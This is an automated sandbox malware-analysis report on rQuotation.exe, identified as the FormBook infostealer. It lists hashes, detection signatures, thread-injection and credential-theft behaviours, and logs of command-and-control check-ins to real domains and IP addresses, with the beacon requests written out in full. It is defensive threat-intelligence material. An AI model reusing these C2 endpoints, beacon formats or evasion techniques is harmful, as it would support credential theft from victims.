Windows Analysis Report
rQuotation.exe

Overview

General Information

Sample name: rQuotation.exe
Analysis ID: 1579601
MD5: d5828dcadc44bcdb74450e5a47118e5e
SHA1: 1a83aade8a8eca25a9d4e92323ca22dd9401c531
SHA256: 86f08a9f25687299366871821a8b14e11a406a4b83ece1711355505ad4dc1866
Tags: exe, user-Porcupine

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • rQuotation.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\rQuotation.exe" MD5: D5828DCADC44BCDB74450E5A47118E5E)
    • gAmAZOKQyy.exe (PID: 4588 cmdline: "C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • NETSTAT.EXE (PID: 7876 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
        • gAmAZOKQyy.exe (PID: 4960 cmdline: "C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 8036 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
0.2.rQuotation.exe.840000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T04:08:06.153570+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 52.223.13.41 | 80 | TCP
2024-12-23T04:08:31.455127+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49772 | 192.30.252.154 | 80 | TCP
2024-12-23T04:08:46.361069+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49811 | 209.74.79.40 | 80 | TCP
2024-12-23T04:09:01.789855+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49850 | 202.95.11.110 | 80 | TCP
2024-12-23T04:09:25.825097+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49909 | 199.59.243.227 | 80 | TCP
2024-12-23T04:09:41.161466+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49948 | 192.186.58.31 | 80 | TCP
2024-12-23T04:09:57.792650+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49988 | 103.106.67.112 | 80 | TCP
2024-12-23T04:10:13.179553+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50030 | 185.68.108.243 | 80 | TCP
2024-12-23T04:10:28.813593+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50034 | 52.223.13.41 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T04:08:23.474747+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 192.30.252.154 | 80 | TCP
2024-12-23T04:08:26.138223+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49760 | 192.30.252.154 | 80 | TCP
2024-12-23T04:08:28.793205+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 192.30.252.154 | 80 | TCP
2024-12-23T04:08:38.333889+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49788 | 209.74.79.40 | 80 | TCP
2024-12-23T04:08:41.037762+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49797 | 209.74.79.40 | 80 | TCP
2024-12-23T04:08:43.781516+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49805 | 209.74.79.40 | 80 | TCP
2024-12-23T04:08:53.588934+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49827 | 202.95.11.110 | 80 | TCP
2024-12-23T04:08:56.260635+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49836 | 202.95.11.110 | 80 | TCP
2024-12-23T04:08:58.932562+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49842 | 202.95.11.110 | 80 | TCP
2024-12-23T04:09:17.847715+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49889 | 199.59.243.227 | 80 | TCP
2024-12-23T04:09:20.511273+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49897 | 199.59.243.227 | 80 | TCP
2024-12-23T04:09:23.180910+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49903 | 199.59.243.227 | 80 | TCP
2024-12-23T04:09:33.057642+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49928 | 192.186.58.31 | 80 | TCP
2024-12-23T04:09:35.713860+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49935 | 192.186.58.31 | 80 | TCP
2024-12-23T04:09:38.370315+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49942 | 192.186.58.31 | 80 | TCP
2024-12-23T04:09:49.229653+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49969 | 103.106.67.112 | 80 | TCP
2024-12-23T04:09:51.885890+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49974 | 103.106.67.112 | 80 | TCP
2024-12-23T04:09:54.542108+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49980 | 103.106.67.112 | 80 | TCP
2024-12-23T04:10:05.153667+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50007 | 185.68.108.243 | 80 | TCP
2024-12-23T04:10:07.867470+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 185.68.108.243 | 80 | TCP
2024-12-23T04:10:10.523001+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50024 | 185.68.108.243 | 80 | TCP
2024-12-23T04:10:20.552836+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 52.223.13.41 | 80 | TCP
2024-12-23T04:10:23.216474+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50032 | 52.223.13.41 | 80 | TCP
2024-12-23T04:10:25.875769+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50033 | 52.223.13.41 | 80 | TCP

              AV Detection

              Source: rQuotation.exe | Avira: detected
              Source: rQuotation.exe | ReversingLabs: Detection: 71%
              Source: rQuotation.exe | Virustotal: Detection: 79%
              Source: Yara match | File source: 0.2.rQuotation.exe.840000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: rQuotation.exe | Joe Sandbox ML: detected
              Source: rQuotation.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: rQuotation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: netstat.pdbGCTL source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572470472.0000000001107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstat.pdb source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572470472.0000000001107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gAmAZOKQyy.exe, 00000004.00000000.1946445492.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp, gAmAZOKQyy.exe, 00000006.00000000.2087665206.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: rQuotation.exe, 00000000.00000003.1931437975.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000003.1929221288.000000000132C000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.000000000182E000.00000040.00001000.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.000000000346E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2021924278.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2023759213.0000000003120000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: rQuotation.exe, rQuotation.exe, 00000000.00000003.1931437975.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000003.1929221288.000000000132C000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.000000000182E000.00000040.00001000.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.3573169632.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.000000000346E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2021924278.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2023759213.0000000003120000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02A6CC20 FindFirstFileW,FindNextFileW,FindClose, 5_2_02A6CC20
              Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then xor eax, eax 5_2_02A59E20
              Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then mov ebx, 00000004h 5_2_030704E8
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe | Code function: 4x nop then pop edi 6_2_0550398A
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe | Code function: 4x nop then xor eax, eax 6_2_05507840
              Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: 4x nop then mov ebx, 00000004h 7_2_000001610DF724E8

              Networking

              Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 52.223.13.41:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 192.30.252.154:80
              Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49811 -> 209.74.79.40:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 192.30.252.154:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49788 -> 209.74.79.40:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49797 -> 209.74.79.40:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49842 -> 202.95.11.110:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49827 -> 202.95.11.110:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49805 -> 209.74.79.40:80
              Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49772 -> 192.30.252.154:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 202.95.11.110:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 192.30.252.154:80
              Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49850 -> 202.95.11.110:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 199.59.243.227:80
              Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49909 -> 199.59.243.227:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49897 -> 199.59.243.227:80
              Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49948 -> 192.186.58.31:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49969 -> 103.106.67.112:80
              Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49988 -> 103.106.67.112:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49935 -> 192.186.58.31:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49928 -> 192.186.58.31:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49974 -> 103.106.67.112:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49980 -> 103.106.67.112:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 52.223.13.41:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 185.68.108.243:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 52.223.13.41:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 185.68.108.243:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49889 -> 199.59.243.227:80
              Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 52.223.13.41:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49942 -> 192.186.58.31:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 52.223.13.41:80
              Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 185.68.108.243:80
              Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 185.68.108.243:80
              Source: DNS query: www.llmsforrobot.xyz
              Source: DNS query: www.furrcali.xyz
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
              Source: Joe Sandbox View | IP Address: 103.106.67.112
              Source: Joe Sandbox View | IP Address: 199.59.243.227
              Source: Joe Sandbox View | ASN Name: GITHUBUS
              Source: Joe Sandbox View | ASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ
              Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
              Source: Joe Sandbox View | ASN Name: BCPL-SGBGPNETGlobalASNSG
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /7hkm/?4v7=PTrvXdcgSMfdhotioq8pnUkjNlxy61myV8F0WPH7Z2Bq/45rtMPjYLxLqkAieyptPF2XeHF9OCzJ15KQyhm6FHL/8EngdtV8gwYC3BL3/d+rtru4um4WJso=&pRel=chN0 HTTP/1.1Host: www.techforcreators.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /033w/?4v7=kZ/YQzY58uTPDy1SllACl2sKF+E3DMV6CvFnNkvZwHFDq3DsFBZ82/i3KTvXvlfgnzlAmNdsBQySpwa+g3edi3aCFGjCcomWBBYIDruBe4sqSy428ijZjbg=&pRel=chN0 HTTP/1.1Host: www.llmsforrobot.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /sd58/?4v7=qfAN8teQqWHl0pB75/wJ4PX285H5E3s25CgjwOd4PKd8zFqJMRX78aaJW2P6tpRkk2pp9lWkT1iA/dTcpEbuyLhsAas7SiW6kXoDkzQ8RaPJjUuFvtCyEK8=&pRel=chN0 HTTP/1.1Host: www.yous.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /qiu4/?4v7=YBXJjFFON5DPMwFVWr+hwJljRIjxpgK+/QxKc43NeU4JKf8f+IoPZInAdaP+cGuotGfyq3307yGnLgei346rHNdmY6IWbN+gRmHxztRtQ7iWQPlqqkvpfgI=&pRel=chN0 HTTP/1.1Host: www.mirenzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /w4ic/?4v7=yS69adElfH9iGuX+6qGjDo1pzUaFwG2aAiZ0CSeLQ3WEURd5D9NqWLH4alYcst9SwKAkCKhjPGbctdXA/FIYLK0HEa0UfTU4rNsaCNMRH49YQwEuYtvnEXw=&pRel=chN0 HTTP/1.1Host: www.sob.ripAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /gkfy/?4v7=07qYlGdy+WbqOk0cXAw1tsG+BYjZolWoNNS4BkQ+NnlSijGpnUaEsXAiEpeyBCiqWtAN48ClO71D0ZdXiZHmAUTm7Ixf7FFoVzGex49KD8u42uAoUmpEbrc=&pRel=chN0 HTTP/1.1Host: www.aihuzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /3dtl/?4v7=WTzrGLrFoDOf3MfqMggnB2yODJjw2W6R3d7AI4DzdlPnCYzv+YsvzCma/KjEqV7kmJXwzvABskUepNotbm90GG8Ab8L4vbMqXlBd8atmujJl3TdcKhvlJPk=&pRel=chN0 HTTP/1.1Host: www.furrcali.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /45u5/?pRel=chN0&4v7=0TAGyGi/QqAief36fqQZkTt5+nwNOdjQfsW4ILLFJiz2YBVGcbvNqcBGTGc+pdHcbXHcTIwSr9BXUFYIju8DT0Mq2PAg2Di4D0yPeZ6V6HqzRoZnxJ6cd60= HTTP/1.1Host: www.accusolution.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: GET /zsuo/?4v7=YAgg/ldayhOHmzfsjWLXvaG7J5REZu11MAD7iHXRrkYiTwNIRlKLNa8zNDpduzX56xW5NVkmDFlOQcyvict8ZBdH6DXl406L+zQHeArrLeiD5GII5G18dkg=&pRel=chN0 HTTP/1.1Host: www.seamarket.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global traffic | DNS traffic detected: DNS query: www.techforcreators.live
              Source: global traffic | DNS traffic detected: DNS query: www.llmsforrobot.xyz
              Source: global traffic | DNS traffic detected: DNS query: www.yous.website
              Source: global traffic | DNS traffic detected: DNS query: www.mirenzhibo.net
              Source: global traffic | DNS traffic detected: DNS query: www.amorinc.click
              Source: global traffic | DNS traffic detected: DNS query: www.sob.rip
              Source: global traffic | DNS traffic detected: DNS query: www.aihuzhibo.net
              Source: global traffic | DNS traffic detected: DNS query: www.furrcali.xyz
              Source: global traffic | DNS traffic detected: DNS query: www.accusolution.pro
              Source: global traffic | DNS traffic detected: DNS query: www.seamarket.shop
              Source: unknownHTTP traffic detected: POST /033w/ HTTP/1.1Host: www.llmsforrobot.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflateOrigin: http://www.llmsforrobot.xyzReferer: http://www.llmsforrobot.xyz/033w/Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 6e 69 63 6f 72 6e 21 20 26 6d 69 64 64 6f 74 3b 20 47 69 74 48 75 62 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 31 66 31 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 20 6d 61 72 67 69 6e 3a 20 35 30 70 78 20 61 75 74 6f 20 34 30 70 78 20 61 75 74 6f 3b 
